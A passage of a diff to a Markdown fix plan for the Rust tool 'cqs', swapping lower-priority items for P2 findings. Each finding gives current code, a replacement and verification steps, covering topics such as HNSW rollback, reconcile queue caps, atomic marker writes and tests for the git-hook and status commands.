-    for lang in REGISTRY.all() {
-        if !lang.has_grammar() { continue; }
-        assert!(
-            !lang.chunk_query.is_empty(),
-            "{:?}: chunk_query is empty — silent zero-chunk language",
-            lang.lang
-        );
-    }
-}
-```
-(`has_grammar` may already exist or can be a small helper that returns true when the lang's tree-sitter feature is enabled.)
-
----
-
-## P3.29 — `find_project_root` markers as a data table
-
-**Finding:** P3.29
-**Files:** `src/cli/config.rs:155-162`
-**Why:** Hardcoded array works today; converting to a `static` table makes adding Maven / Gradle / .NET / Bazel a one-row change.
-
-### Current code
-```rust
-let markers = [
-    "Cargo.toml", "package.json", "pyproject.toml",
-    "setup.py", "go.mod", ".git",
-];
-for current in path.ancestors() {
-    for marker in &markers {
-        if current.join(marker).exists() { return Some(current.to_path_buf()); }
-    }
-}
-```
-
-### Replacement
-At module top:
-```rust
-/// (marker filename, label) — label is informational, not used in lookup.
-static PROJECT_ROOT_MARKERS: &[(&str, &str)] = &[
-    ("Cargo.toml", "rust"),
-    ("package.json", "node"),
-    ("pyproject.toml", "python"),
-    ("setup.py", "python"),
-    ("go.mod", "go"),
-    (".git", "fallback"),
-];
-```
-Iterate `PROJECT_ROOT_MARKERS.iter().any(|(m, _)| current.join(m).exists())`.
-
----
-
-## P3.30 — `structural_matchers` shared library
-
-**Finding:** P3.30
-**Files:** `src/language/mod.rs:191, 345`; `src/structural.rs`
-**Why:** Currently per-language `Option<&[(name, fn)]>`; sharing common matchers (SwallowedException, AsyncIO, Mutex, Unsafe) across Python/JS/Go/Rust requires copying fn bodies.
-
-### Replacement
-Define a small set of cross-language matcher functions in `src/structural.rs` keyed by `(Pattern, Language)`:
-```rust
-pub(crate) static SHARED_MATCHERS: &[(Pattern, Language, StructuralMatcherFn)] = &[
-    (Pattern::SwallowedException, Language::Rust, matchers::rust::swallow_exc),
-    (Pattern::SwallowedException, Language::Python, matchers::python::swallow_exc),
-    // ...
-];
-```
-Have `LanguageDef::structural_matchers` either be derived from this table at lookup time (filter by `lang`), or keep the field but have each `definition_*` row reference the shared fn pointer. Adding a pattern-language pair = one slice row, not a new fn body.
-
----
-
-## P3.31 — Embedder preset `extras` map (deferred-friendly)
-
-**Finding:** P3.31
-**Files:** `src/embedder/models.rs:163-300`
-**Why:** New cross-cutting preset attribute fans out to every row; flagging now since presets are still stable but pressure is rising.
-
-### Replacement
-Skip if presets are stable. If/when frequent attribute additions land, extend the `define_embedder_presets!` macro grammar with an `extras: { gpu_only = true, expects_bos = true }` block per row that desugars to a `HashMap<&'static str, ModelAttr>` field on `ModelConfig`. Required fields stay positional; sparse/optional ones go through `extras`.
-
----
-
-## P3.32 — Cache paths use `dirs::cache_dir()` on Windows
-
-**Finding:** P3.32
-**Files:** `src/cache.rs:80-84` (`EmbeddingCache::default_path`), `src/cache.rs:1399-1403` (`QueryCache::default_path`), `src/cli/batch/commands.rs:373-376` (query_log)
-**Why:** Hardcoded `~/.cache/cqs/...` becomes a hidden `.cache` folder under `C:\Users\X\` on Windows; native is `%LOCALAPPDATA%\cqs\`.
-
-### Current code (pattern at all 3 sites)
-```rust
-dirs::home_dir()
-    .map(|h| h.join(".cache").join("cqs").join("embeddings.db"))
-```
-
-### Replacement
-```rust
-dirs::cache_dir()
-    .or_else(|| dirs::home_dir().map(|h| h.join(".cache")))
-    .map(|c| c.join("cqs").join("embeddings.db"))
-```
-Apply the same shape to `QueryCache::default_path` (`query_cache.db`) and the `query_log.jsonl` path in `cli/batch/commands.rs:373-376`.
-
----
-
-## P3.33 — `dispatch_drift/diff` JSON file fields use `normalize_path`
-
-**Finding:** P3.33
-**Files:** `src/suggest.rs:101`, `src/store/types.rs:220`
-**Why:** Two more PB-V1.29-5 sites that emit Windows backslashes via `.display().to_string()`.
-
-### Current code
-```rust
-// src/suggest.rs:101
-let file = dead.chunk.file.display().to_string();
-
-// src/store/types.rs:220
-let file_display = file.display().to_string();
-```
-
-### Replacement
-```rust
-// src/suggest.rs:101
-let file = crate::normalize_path(&dead.chunk.file);
-
-// src/store/types.rs:220
-let file_display = crate::normalize_path(file);
-```
-(If `normalize_path` accepts `&Path` not `&PathBuf`, adjust the borrow.)
-
----
-
-## P3.34 — `find_ld_library_dir` Windows arm (or doc the gap)
-
-**Finding:** P3.34
-**Files:** `src/embedder/provider.rs:115-123`
-**Why:** Currently `cfg(target_os="linux")`-gated; no Windows equivalent. Either add one or doc the delegation explicitly.
-
-### Replacement (lower-cost: doc the gap)
-Add at the top of `ensure_ort_provider_libs`:
-```rust
-/// On Linux this walks `LD_LIBRARY_PATH` (`:`-separated) and symlinks ORT
-/// provider .so files into the runtime's search dir. On Windows and macOS
-/// provider DLL/dylib resolution is delegated entirely to ORT's loader
-/// (Windows: `PATH` search; macOS: `DYLD_*` paths). If a future regression
-/// surfaces on those platforms, add an arm with `;`-split for `PATH` (Win)
-/// or `DYLD_LIBRARY_PATH` (mac).
-```
-Keep behavior unchanged.
-
----
-
-## P3.35 — Document `index.lock` advisory-vs-mandatory split
-
-**Finding:** P3.35
-**Files:** `src/cli/files.rs:120-213`
-**Why:** Same code, two very different concurrency contracts (Linux advisory `flock` vs Windows mandatory `LockFileEx`). Doc + one-time warn so callers can reason about it.
-
-### Replacement
-1. Extend the `acquire_index_lock` doc-comment to spell out: Linux/macOS = advisory (non-cqs writers can corrupt); Windows = mandatory (third-party tools may see "sharing violation"); WSL `/mnt/c/` follows Linux semantics for the call but Windows for the underlying file.
-2. On Windows only, add a one-shot `tracing::warn!` (gated on `OnceLock`) at first lock acquisition:
-```rust
-#[cfg(windows)]
-{
-    static WARNED: std::sync::OnceLock<()> = std::sync::OnceLock::new();
-    WARNED.get_or_init(|| {
-        tracing::warn!(
-            "index.lock is mandatory on Windows — third-party tools opening \
-             index.db may fail with sharing violations while cqs is running"
-        );
+fn tag_user_code_visits_arbitrary_nested_chunks() {
+    let mut json = serde_json::json!({
+        "entry_point": {"name": "foo", "file": "a.rs", "line_start": 10},
+        "future_field": {
+            "examples": [
+                {"name": "bar", "file": "b.rs", "line_start": 20},
+            ]
+        }
     });
+    tag_user_code_trust_level(&mut json);
+    assert_eq!(json["entry_point"]["trust_level"], "user-code");
+    assert_eq!(json["future_field"]["examples"][0]["trust_level"], "user-code");
+}
+
+#[test]
+fn tag_user_code_does_not_tag_non_chunk_objects() {
+    let mut json = serde_json::json!({"meta": {"version": 1}});
+    tag_user_code_trust_level(&mut json);
+    assert!(json["meta"].get("trust_level").is_none());
 }
 ```
+
+### Verification
+
+- `cargo test --features gpu-index --lib commands -- tag_user_code`.
+- Confirm scout / onboard / where output JSON shapes still pass downstream consumers.
 
 ---
 
-## P3.36 — `is_wsl_drvfs_path` matches UNC + uppercase drives
+## P2: DS-V1.30.1-D1 — `cqs index --force` reopen leaves stale `pending_rebuild`
 
-**Finding:** P3.36
-**Files:** `src/config.rs:92-101`
-**Why:** Misses `//wsl.localhost/`, `//wsl$/`, and uppercase drive letters when WSL `automount.options=case=force` is set.
+**Files:** `src/cli/watch/mod.rs:1102-1122`
+**Effort:** ~45 minutes
+**Why:** When the watch loop detects `cqs index --force` rotated `index.db`, it reopens the Store but does NOT reset `state.pending_rebuild`. The in-flight rebuild's pre-rotation delta references OLD DB chunk IDs; replaying it against the NEW HNSW corrupts vectors.
 
 ### Current code
+
 ```rust
-pub fn is_wsl_drvfs_path(path: &Path) -> bool {
-    let s = path.to_string_lossy();
-    s.starts_with("/mnt/")
-        && s.chars().nth(5).is_some_and(|c| c.is_ascii_lowercase())
-        && s.chars().nth(6) == Some('/')
-}
+// src/cli/watch/mod.rs:1102-1122
+                    let current_id = db_file_identity(&index_path);
+                    if current_id != db_id {
+                        info!("index.db replaced (likely cqs index --force), reopening store");
+                        drop(store);
+                        store = Store::open_with_runtime(&index_path, Arc::clone(&shared_rt))
+                            .with_context(|| {
+                                format!(
+                                    "Failed to re-open store at {} after DB replacement",
+                                    index_path.display()
+                                )
+                            })?;
+                        state.hnsw_index = None;
+                        state.incremental_count = 0;
+                    }
 ```
 
-### Replacement
+### Replacement / approach
+
 ```rust
-pub fn is_wsl_drvfs_path(path: &Path) -> bool {
-    let s = path.to_string_lossy();
-    // Standard /mnt/<letter>/ — accept upper or lowercase
-    if let Some(rest) = s.strip_prefix("/mnt/") {
-        if let (Some(c), Some('/')) = (rest.chars().next(), rest.chars().nth(1)) {
-            if c.is_ascii_alphabetic() { return true; }
+                    let current_id = db_file_identity(&index_path);
+                    if current_id != db_id {
+                        info!("index.db replaced (likely cqs index --force), reopening store");
+                        drop(store);
+                        store = Store::open_with_runtime(&index_path, Arc::clone(&shared_rt))
+                            .with_context(|| {
+                                format!(
+                                    "Failed to re-open store at {} after DB replacement",
+                                    index_path.display()
+                                )
+                            })?;
+                        state.hnsw_index = None;
+                        state.incremental_count = 0;
+                        // DS-V1.30.1-D1: drop in-flight rebuild whose pending
+                        // delta references OLD DB chunk IDs. The rebuild
+                        // thread will tx.send(...) into a dropped receiver
+                        // (no-op per rebuild.rs:289). Force a fresh rebuild
+                        // on the next threshold tick against the new DB.
+                        if state.pending_rebuild.take().is_some() {
+                            tracing::info!(
+                                "discarded in-flight HNSW rebuild after DB replacement; \
+                                 next threshold tick will rebuild against new DB",
+                            );
+                        }
+                    }
+```
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- Test: simulate concurrent `cqs index --force` while a rebuild is in flight, confirm the pending_rebuild is dropped and the next snapshot doesn't show stale `delta_saturated`.
+
+---
+
+## P2: DS-V1.30.1-D2 — `run_daemon_reconcile` bypasses `max_pending_files()` cap
+
+**Files:** `src/cli/watch/reconcile.rs:103, 128`, `src/cli/watch/events.rs` (max_pending_files reference)
+**Effort:** ~45 minutes
+**Why:** Reconcile blindly inserts every divergent file into `pending_files` with no cap check. A `git checkout` of a sibling branch with 50k file changes pushes the queue well past `max_pending_files()` (default 5000), defeating the documented backpressure. Subsequent inotify events increment `dropped_this_cycle` for unrelated reasons; the next `process_file_changes` tries to drain 50k files in one batch.
+
+### Current code
+
+```rust
+// src/cli/watch/reconcile.rs:95-134
+    for rel in disk_files {
+        let origin = rel.to_string_lossy().replace('\\', "/");
+        match indexed.get(&origin) {
+            None => {
+                if pending_files.insert(rel.clone()) {
+                    added += 1;
+                    queued += 1;
+                }
+            }
+            Some(stored_mtime) => {
+                // ...
+                if needs_reindex && pending_files.insert(rel.clone()) {
+                    modified += 1;
+                    queued += 1;
+                }
+            }
         }
     }
-    // UNC paths reaching back into WSL
-    if s.starts_with("//wsl.localhost/") || s.starts_with("//wsl$/") {
-        return true;
+```
+
+### Replacement / approach
+
+Pass `max_pending_files()` into reconcile and stop inserting once the queue hits the cap. Track skipped count locally:
+
+```rust
+pub(super) fn run_daemon_reconcile(
+    store: &Store,
+    root: &Path,
+    parser: &CqParser,
+    no_ignore: bool,
+    pending_files: &mut HashSet<PathBuf>,
+    cap: usize,  // new parameter — caller passes max_pending_files()
+) -> usize {
+    let _span = tracing::info_span!("daemon_reconcile").entered();
+    // ... existing setup ...
+
+    let mut added = 0usize;
+    let mut modified = 0usize;
+    let mut queued = 0usize;
+    let mut skipped_cap = 0usize;
+    for rel in disk_files {
+        // DS-V1.30.1-D2: respect the same backpressure cap as the inotify
+        // ingest path (events.rs:108). Without this, a bulk branch switch
+        // can push the queue to 50k files on one tick, masking subsequent
+        // genuine drop signals and forcing a 50k-file synchronous drain.
+        if pending_files.len() >= cap {
+            skipped_cap += 1;
+            continue;
+        }
+
+        // ... existing match dispatch using pending_files.insert ...
     }
-    false
+
+    if skipped_cap > 0 {
+        tracing::warn!(
+            cap,
+            skipped = skipped_cap,
+            "Reconcile: queue cap reached; deferred {skipped_cap} divergent files \
+             to next reconcile pass",
+        );
+    }
+    // ... existing terminal info/debug ...
+    queued
+}
+```
+
+Update **all 7 call sites** when adding the `cap: usize` parameter — the signature change cascades:
+
+**Production (2 sites):**
+- `src/cli/watch/mod.rs:1055` — pass `crate::cli::watch::events::max_pending_files()`
+- `src/cli/watch/mod.rs:1268` — same
+
+**Tests (5 sites in the same file as the function):**
+- `src/cli/watch/reconcile.rs:190`
+- `src/cli/watch/reconcile.rs:204`
+- `src/cli/watch/reconcile.rs:225`
+- `src/cli/watch/reconcile.rs:362`
+- `src/cli/watch/reconcile.rs:450`
+
+Tests can pass any value — `usize::MAX` to keep behaviour unchanged for tests not exercising the cap, or a small integer (10) for the new `reconcile_respects_pending_cap` test.
+
+### Verification
+
+- `cargo test --features gpu-index --lib reconcile` (all 5 existing tests must still pass after signature update).
+- Add `reconcile_respects_pending_cap` test: seed 100 divergent files, set `cap=10`, run reconcile, assert `pending_files.len() == 10` and the warn log fired with `skipped=90`.
+- Compile-time check via the cascade: removing or renaming a call site argument fails the build immediately, so the 5-test sweep is mechanical.
+
+---
+
+## P2: DS-V1.30.1-D5 — `.cqs/.dirty` fallback marker write not atomic
+
+**Reframed during verification:** original prompt called `atomic_replace(&dirty, b"")` with wrong arity; real signature is `(tmp_path: &Path, final_path: &Path) -> io::Result<()>`. Replacement now stages bytes to a `.dirty.tmp` sibling, then promotes via `atomic_replace`.
+
+**Files:** `src/cli/commands/infra/hook.rs:329-332`
+**Effort:** ~15 minutes
+**Why:** `std::fs::write(&dirty, b"")` is a non-atomic open+write+close, no fsync. On crash + power loss between the hook's write and the next fs sync of `.cqs/`, the file's directory entry can be lost. Since `cqs hook` exists *specifically* for the daemon-offline case, losing the marker means a `git checkout` post-reboot won't trigger reconcile.
+
+### Current code
+
+```rust
+// src/cli/commands/infra/hook.rs:329-332
+    let dirty = cqs_dir.join(".dirty");
+    std::fs::create_dir_all(&cqs_dir).with_context(|| format!("create {}", cqs_dir.display()))?;
+    std::fs::write(&dirty, b"").with_context(|| format!("touch {}", dirty.display()))?;
+```
+
+### Replacement / approach
+
+`cqs::fs::atomic_replace` (real signature `(tmp_path: &Path, final_path: &Path) -> io::Result<()>` per `src/fs.rs:41`) is a write-tmp-then-rename helper, not a write-bytes helper. For the empty marker, write `b""` to a `.dirty.tmp` sibling first, then promote:
+
+```rust
+    let dirty = cqs_dir.join(".dirty");
+    std::fs::create_dir_all(&cqs_dir).with_context(|| format!("create {}", cqs_dir.display()))?;
+    // DS-V1.30.1-D5: stage to .dirty.tmp then atomic_replace so the
+    // marker survives a power-cut between write and the next directory
+    // sync. atomic_replace fsyncs the tmp before rename and best-effort
+    // fsyncs the parent afterwards. The marker is the *only* signal the
+    // daemon will see post-reboot, so durability matters more than the
+    // empty-file write cost.
+    let tmp = cqs_dir.join(".dirty.tmp");
+    std::fs::write(&tmp, b"").with_context(|| format!("stage {}", tmp.display()))?;
+    cqs::fs::atomic_replace(&tmp, &dirty)
+        .with_context(|| format!("promote {} -> {}", tmp.display(), dirty.display()))?;
+```
+
+`crate::fs::atomic_replace` already exists (used by `notes.toml`, `audit-mode.json`, slot writers post-#P3.39). It owns the fsync-tmp-then-rename-then-fsync-parent sequence — caller stages the bytes.
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib hook`.
+- Add a test that writes the marker, confirms it exists, the file size is 0, and `.dirty.tmp` was cleaned up by the rename.
+
+---
+
+## P2: DS-V1.30.1-D7 — HNSW rollback path leaves `.bak` files orphaned when restore-rename fails
+
+**Reframed during verification:** original prompt mis-named the function as `save_owned` (real name: `save` per `src/hnsw/persist.rs:208`) and used `anyhow::anyhow!` / `anyhow::bail!` inside a function returning `Result<(), HnswError>`. Replacement now uses the correct name and returns `HnswError::Internal(...)` so the patch compiles.
+
+**Files:** `src/hnsw/persist.rs:509-553`
+**Effort:** ~45 minutes
+**Why:** Rollback path iterates `all_exts` and on `std::fs::rename` failure logs an error and continues — so `bak_path` is in an indeterminate state. The next `save` skips the rename-back step (line 436 guards on `final_path.exists()`), then writes new finals, and a subsequent rollback restores from the *stale* `.bak` from the prior failure. Silently overwrites known-good index with known-bad backup.
+
+### Current code
+
+```rust
+// src/hnsw/persist.rs:509-553 (inside `pub fn save(&self, dir: &Path, basename: &str) -> Result<(), HnswError>`)
+        if let Err(e) = rename_result {
+            // Roll back: remove new files and restore originals from .bak
+            for ext in &moved_exts {
+                let final_path = dir.join(format!("{}.{}", basename, ext));
+                let _ = std::fs::remove_file(&final_path);
+            }
+            for ext in &all_exts {
+                let bak_path = dir.join(format!("{}.{}.bak", basename, ext));
+                let final_path = dir.join(format!("{}.{}", basename, ext));
+                if bak_path.exists() {
+                    if let Err(e) = std::fs::rename(&bak_path, &final_path) {
+                        tracing::error!(
+                            path = %final_path.display(),
+                            error = %e,
+                            "Failed to restore backup during HNSW save rollback"
+                        );
+                    }
+                }
+            }
+            // ... fsync + final cleanup ...
+        }
+```
+
+### Replacement / approach
+
+Track which `.bak` files were successfully restored. On any failure, leave the un-restored ones in place AND emit a clear recovery breadcrumb. At the start of `save`, refuse the new save if `.bak` files exist (evidence of a prior incomplete rollback).
+
+`save` returns `Result<(), HnswError>`, so error returns must produce `HnswError` variants (use `HnswError::Internal(String)` — see `src/hnsw/mod.rs:115`). Do **not** introduce `anyhow` here.
+
+```rust
+        if let Err(e) = rename_result {
+            for ext in &moved_exts {
+                let final_path = dir.join(format!("{}.{}", basename, ext));
+                let _ = std::fs::remove_file(&final_path);
+            }
+            // DS-V1.30.1-D7: track which .bak files were successfully
+            // restored. Any unrestored ones are left in place as recovery
+            // breadcrumbs and the operator gets an actionable error.
+            let mut restore_failures: Vec<(String, std::io::Error)> = Vec::new();
+            for ext in &all_exts {
+                let bak_path = dir.join(format!("{}.{}.bak", basename, ext));
+                let final_path = dir.join(format!("{}.{}", basename, ext));
+                if bak_path.exists() {
+                    if let Err(rename_err) = std::fs::rename(&bak_path, &final_path) {
+                        restore_failures.push((final_path.display().to_string(), rename_err));
+                    }
+                }
+            }
+
+            if !restore_failures.is_empty() {
+                let detail: String = restore_failures
+                    .iter()
+                    .map(|(p, e)| format!("  {p}: {e}"))
+                    .collect::<Vec<_>>()
+                    .join("\n");
+                tracing::error!(
+                    %detail,
+                    dir = %dir.display(),
+                    "HNSW rollback INCOMPLETE — manual recovery required: \
+                     restore .bak files matching {basename}.*.bak in dir",
+                );
+                // Don't fsync over a half-restored state; surface the
+                // partial failure so the next save can refuse cleanly.
+                let _ = std::fs::remove_dir_all(&temp_dir);
+                return Err(HnswError::Internal(format!(
+                    "HNSW rollback partially failed; .bak files present, \
+                     manual recovery required:\n{detail}"
+                )));
+            }
+            // ... existing fsync logic for the all-restored case ...
+        }
+```
+
+Add a guard at the start of `save` (right after the count-mismatch check at line 214):
+
+```rust
+pub fn save(&self, dir: &Path, basename: &str) -> Result<(), HnswError> {
+    // ... existing _span + count-mismatch check ...
+
+    // DS-V1.30.1-D7: refuse to start a new save if a previous rollback
+    // left .bak files behind. The operator must clear them manually so
+    // we don't silently overwrite a known-good index with a stale .bak
+    // on a future rollback.
+    let all_exts = ["hnsw.graph", "hnsw.data", "hnsw.ids", "hnsw.checksum"];
+    let stale_baks: Vec<std::path::PathBuf> = all_exts
+        .iter()
+        .filter_map(|ext| {
+            let bak = dir.join(format!("{}.{}.bak", basename, ext));
+            if bak.exists() { Some(bak) } else { None }
+        })
+        .collect();
+    if !stale_baks.is_empty() {
+        return Err(HnswError::Internal(format!(
+            "stale .bak files from prior failed save: {:?}; manual recovery required \
+             (remove them or rename to current files)",
+            stale_baks,
+        )));
+    }
+    // ... existing body that creates target dir, locks, etc. ...
+}
+```
+
+(Note: `all_exts` is also defined locally lower down at the existing line ~421; either hoist it once or scope this guard's copy with a different name. Hoisting is cleaner.)
+
+### Verification
+
+- `cargo build --features gpu-index`.
+- `cargo test --features gpu-index --lib hnsw -- save_rollback`.
+- Add a test that injects a rename failure mid-rollback and asserts the operator-actionable error message (`HnswError::Internal` with the breadcrumb text) + that subsequent `save` calls bail with the stale-bak guard.
+
+---
+
+## P2: TC-HAP-1.30.1-2 — `cmd_uninstall`, `cmd_fire`, `cmd_status` (hook status) ship with zero tests
+
+**Reframed during verification:** original title and test names referenced `cmd_hook_status`, but the real function is `cmd_status` (verified at `src/cli/commands/infra/hook.rs:339`). Renamed test + extracted helper. Also clarified the marker constants: code matches with `HOOK_MARKER_PREFIX` (`"# cqs:hook"` per line 45), and `HOOK_MARKER_CURRENT` (`"# cqs:hook v1"` per line 46) is what install writes — `CURRENT` contains `PREFIX` so seeding tests with `HOOK_MARKER_CURRENT` exercises the same matcher.
+
+**Files:** `src/cli/commands/infra/hook.rs:262-373`, plus new `tests/cli_hook_test.rs` or in-module tests
+**Effort:** ~75 minutes
+**Why:** Three #1182 CLI commands ship with no test coverage. `cmd_uninstall` foreign-hook-skip branch, `cmd_fire` daemon-fallback branch, and `cmd_status` three-state classifier (installed / foreign / missing) are all unverified.
+
+### Approach
+
+Add three tests in `src/cli/commands/infra/hook.rs::tests` (the file already has a `tests` module per finding TC-HAP-1.30.1-1):
+
+```rust
+#[test]
+fn cmd_uninstall_removes_only_marked_hooks() {
+    let tmp = tempfile::tempdir().unwrap();
+    let hooks = tmp.path().join(".git/hooks");
+    std::fs::create_dir_all(&hooks).unwrap();
+    // Two cqs-marked + one foreign hook. Seeding with HOOK_MARKER_CURRENT
+    // works because the classifier at line 176 checks HOOK_MARKER_PREFIX
+    // (= "# cqs:hook") and HOOK_MARKER_CURRENT (= "# cqs:hook v1") contains
+    // the prefix.
+    std::fs::write(hooks.join("post-checkout"), HOOK_MARKER_CURRENT).unwrap();
+    std::fs::write(hooks.join("post-merge"), HOOK_MARKER_CURRENT).unwrap();
+    std::fs::write(hooks.join("post-rewrite"), "#!/bin/sh\necho user").unwrap();
+
+    // Need to factor cmd_uninstall to take an explicit git_dir param
+    // (or use a path-override env var). See note below.
+    let report = do_uninstall(&hooks).unwrap();
+    assert_eq!(report.removed.len(), 2);
+    assert_eq!(report.skipped_foreign, vec!["post-rewrite".to_string()]);
+}
+
+#[test]
+#[cfg(unix)]
+fn cmd_fire_writes_dirty_marker_when_daemon_absent() {
+    let tmp = tempfile::tempdir().unwrap();
+    let cqs_dir = tmp.path().join(".cqs");
+    // No socket — daemon unreachable. Same path-override pattern.
+    let report = do_fire(&cqs_dir, "post-checkout", vec![], false).unwrap();
+    assert!(!report.sent_to_daemon);
+    assert!(cqs_dir.join(".dirty").exists());
+    assert_eq!(report.dirty_marker, Some(cqs_dir.join(".dirty")));
+}
+
+#[test]
+fn cmd_status_classifies_three_hook_states() {
+    let tmp = tempfile::tempdir().unwrap();
+    let hooks = tmp.path().join(".git/hooks");
+    std::fs::create_dir_all(&hooks).unwrap();
+    // installed: written with marker (HOOK_MARKER_CURRENT contains HOOK_MARKER_PREFIX)
+    std::fs::write(hooks.join("post-checkout"), HOOK_MARKER_CURRENT).unwrap();
+    // foreign: no cqs marker — body never matches HOOK_MARKER_PREFIX
+    std::fs::write(hooks.join("post-merge"), "#!/bin/sh\nuser stuff").unwrap();
+    // missing: post-rewrite absent on disk
+
+    let report = do_hook_status(&hooks).unwrap();
+    assert_eq!(report.installed, vec!["post-checkout".to_string()]);
+    assert_eq!(report.foreign, vec!["post-merge".to_string()]);
+    assert_eq!(report.missing, vec!["post-rewrite".to_string()]);
+}
+```
+
+### Note: factor out path-aware helpers
+
+The current `cmd_uninstall` / `cmd_fire` / `cmd_status` call `find_project_root()` inside; tests need explicit-path equivalents. Factor them:
+
+```rust
+fn cmd_uninstall(json: bool) -> Result<()> {
+    let root = find_project_root();
+    let git_dir = locate_git_hooks_dir(&root)?;
+    let report = do_uninstall(&git_dir)?;
+    emit(&report, json)?;
+    Ok(())
+}
+
+fn do_uninstall(git_dir: &Path) -> Result<UninstallReport> {
+    // ... existing body, now takes git_dir as param ...
+}
+```
+
+Same for `cmd_fire` (extract `do_fire(cqs_dir, name, args, dirty_path)`) and `cmd_status` (extract `do_hook_status(git_dir, cqs_dir_for_daemon_check)` — note the helper is `do_hook_status`, distinct from the public `cmd_status`).
+
+### Verification
+
+- `cargo test --features gpu-index --lib hook -- cmd_uninstall cmd_fire cmd_status`.
+
+---
+
+## P2: RB-10 — `now_unix_secs()` swallows clock-before-epoch errors as `0`
+
+**Files:** `src/watch_status.rs:226-231`
+**Effort:** ~30 minutes
+**Why:** `SystemTime::now().duration_since(UNIX_EPOCH).map(...).unwrap_or(0)` silently returns `0` (= 1970-01-01) on a clock-before-epoch error. Reachable on real systems: pre-NTP-sync VMs/Pis, WSL hypervisor pause-resume, misconfigured Windows RTC. When this happens, every WatchSnapshot publishes `snapshot_at: 0`, downstream freshness logic (`now - snapshot_at > threshold`) decides every snapshot is "56 years stale" and marks the daemon dead.
+
+### Current code
+
+```rust
+// src/watch_status.rs:226-231
+fn now_unix_secs() -> i64 {
+    SystemTime::now()
+        .duration_since(SystemTime::UNIX_EPOCH)
+        .map(|d| d.as_secs() as i64)
+        .unwrap_or(0)
+}
+```
+
+### Replacement / approach
+
+**Reframed during verification:** changing `WatchSnapshot.snapshot_at: i64` to `Option<i64>` is a wire-shape change with a non-trivial blast radius. The original prompt said "wire shape contract changes" but didn't enumerate the impacted sites; here is the full list.
+
+Change `snapshot_at` to `Option<i64>` so missing-clock is unrepresentable as a valid timestamp, and warn-once on bad-clock:
+
+1. Update `WatchSnapshot.snapshot_at` field at `src/watch_status.rs:109` from `i64` to `Option<i64>`.
+
+2. Replace `now_unix_secs` body:
+
+```rust
+fn now_unix_secs() -> Option<i64> {
+    use std::sync::OnceLock;
+    static WARNED_BAD_CLOCK: OnceLock<()> = OnceLock::new();
+
+    match SystemTime::now().duration_since(SystemTime::UNIX_EPOCH) {
+        Ok(d) => i64::try_from(d.as_secs()).ok(),
+        Err(e) => {
+            // RB-10: surface the bad-clock condition once per process so
+            // journalctl operators can correlate stale snapshots with
+            // NTP-pre-sync boot.
+            WARNED_BAD_CLOCK.get_or_init(|| {
+                tracing::warn!(
+                    error = %e,
+                    "system clock is before UNIX_EPOCH — snapshot_at will be None \
+                     until NTP sync; check `timedatectl` / `chronyc tracking`",
+                );
+            });
+            None
+        }
+    }
+}
+```
+
+3. Update **all 5 sites** that touch `snapshot_at` (compile errors will not surface them all in one pass — `i64` -> `Option<i64>` is silent at most assignments because of `Option::Some(x)` wrapping, so enumerate explicitly):
+
+   **Production (3 sites in `watch_status.rs`):**
+   - `src/watch_status.rs:109` — field declaration: `pub snapshot_at: Option<i64>,`
+   - `src/watch_status.rs:128` — `WatchSnapshot::unknown`: `snapshot_at: now_unix_secs(),` (already returns `Option<i64>`, no change needed once signature is updated)
+   - `src/watch_status.rs:221` — `WatchSnapshot::compute`: same — `snapshot_at: now_unix_secs(),`
+
+   **Test fixtures (3 sites in `daemon_translate.rs`):**
+   - `src/daemon_translate.rs:1032` — change `snapshot_at: 1_734_120_500,` to `snapshot_at: Some(1_734_120_500),`
+   - `src/daemon_translate.rs:1237` — same
+   - `src/daemon_translate.rs:1313` — same
+
+   **Batch handler validator (1 site):**
+   - `src/cli/batch/handlers/misc.rs:638-639` — the `obj.contains_key("snapshot_at")` assertion still holds because `null` is still a key (serde serializes `Option::None` as JSON `null`, key present). Verify the test's intent: if it's checking "field is present in JSON regardless of value" the existing line is correct. If it's checking "snapshot_at is a number" add a follow-up `obj["snapshot_at"].is_number()` for the healthy-clock path. Recommend the latter — leave the contains_key check, add `is_number()` for the success-path test.
+
+4. Downstream JSON consumers will see `"snapshot_at": null` instead of `0` on a bad clock — the wire shape contract changes from "always populated, may be 1970" to "Some when the clock is sane." This is intentional; the previous shape was a lie and consumers comparing `now - snapshot_at > threshold` were already buggy.
+
+### Verification
+
+- `cargo build --features gpu-index` (must build cleanly after all 7 sites are updated).
+- `cargo test --features gpu-index --lib watch_status`.
+- `cargo test --features gpu-index --lib daemon_translate` (test fixtures must compile).
+- `cargo test --features gpu-index --lib batch -- snapshot_envelope_shape` (the misc.rs validator at line 638).
+- Verify wire-shape change: `cqs status --watch-fresh --json` shows `"snapshot_at": <int>` on a healthy system, `null` only on bad clock.
+
+---
+
+## P2: TC-HAP-1.30.1-3 — `cmd_status` 6-row behavior matrix unpinned
+
+**Files:** `src/cli/commands/infra/status.rs:38-103`, plus new `tests/cli_status_test.rs`
+**Effort:** ~60 minutes
+**Why:** `cmd_status` ships zero tests on the CLI body. The docstring promises a 6-row behaviour matrix (no flag, --watch-fresh, --wait without --watch-fresh, etc.) — none of the exit codes or output shapes are pinned. A regression that swaps `state:` and `modified_files=` lines goes undetected.
+
+### Approach
+
+Add `tests/cli_status_test.rs` (mirrors `tests/cli_ref_test.rs` shape — XDG-isolated, `assert_cmd`, gated behind `slow-tests`):
+
+```rust
+//! Integration tests for `cqs status`. Pins the 6-row behaviour matrix
+//! from the cmd_status docstring.
+
+#[cfg(all(unix, feature = "slow-tests"))]
+#[test]
+fn cqs_status_no_flag_exits_one_with_gate_message() {
+    let tmp = tempfile::tempdir().unwrap();
+    let output = assert_cmd::Command::cargo_bin("cqs")
+        .unwrap()
+        .arg("status")
+        .env("XDG_RUNTIME_DIR", tmp.path())
+        .current_dir(tmp.path())
+        .output()
+        .unwrap();
+    assert_eq!(output.status.code(), Some(1));
+    let stderr = String::from_utf8_lossy(&output.stderr);
+    assert!(stderr.contains("--watch-fresh"));
+}
+
+#[cfg(all(unix, feature = "slow-tests"))]
+#[test]
+fn cqs_status_wait_without_watch_fresh_exits_one() {
+    let tmp = tempfile::tempdir().unwrap();
+    let output = assert_cmd::Command::cargo_bin("cqs")
+        .unwrap()
+        .args(["status", "--wait"])
+        .env("XDG_RUNTIME_DIR", tmp.path())
+        .current_dir(tmp.path())
+        .output()
+        .unwrap();
+    assert_eq!(output.status.code(), Some(1));
+}
+
+#[cfg(all(unix, feature = "slow-tests"))]
+#[test]
+fn cqs_status_watch_fresh_without_daemon_exits_one_with_friendly_msg() {
+    let tmp = tempfile::tempdir().unwrap();
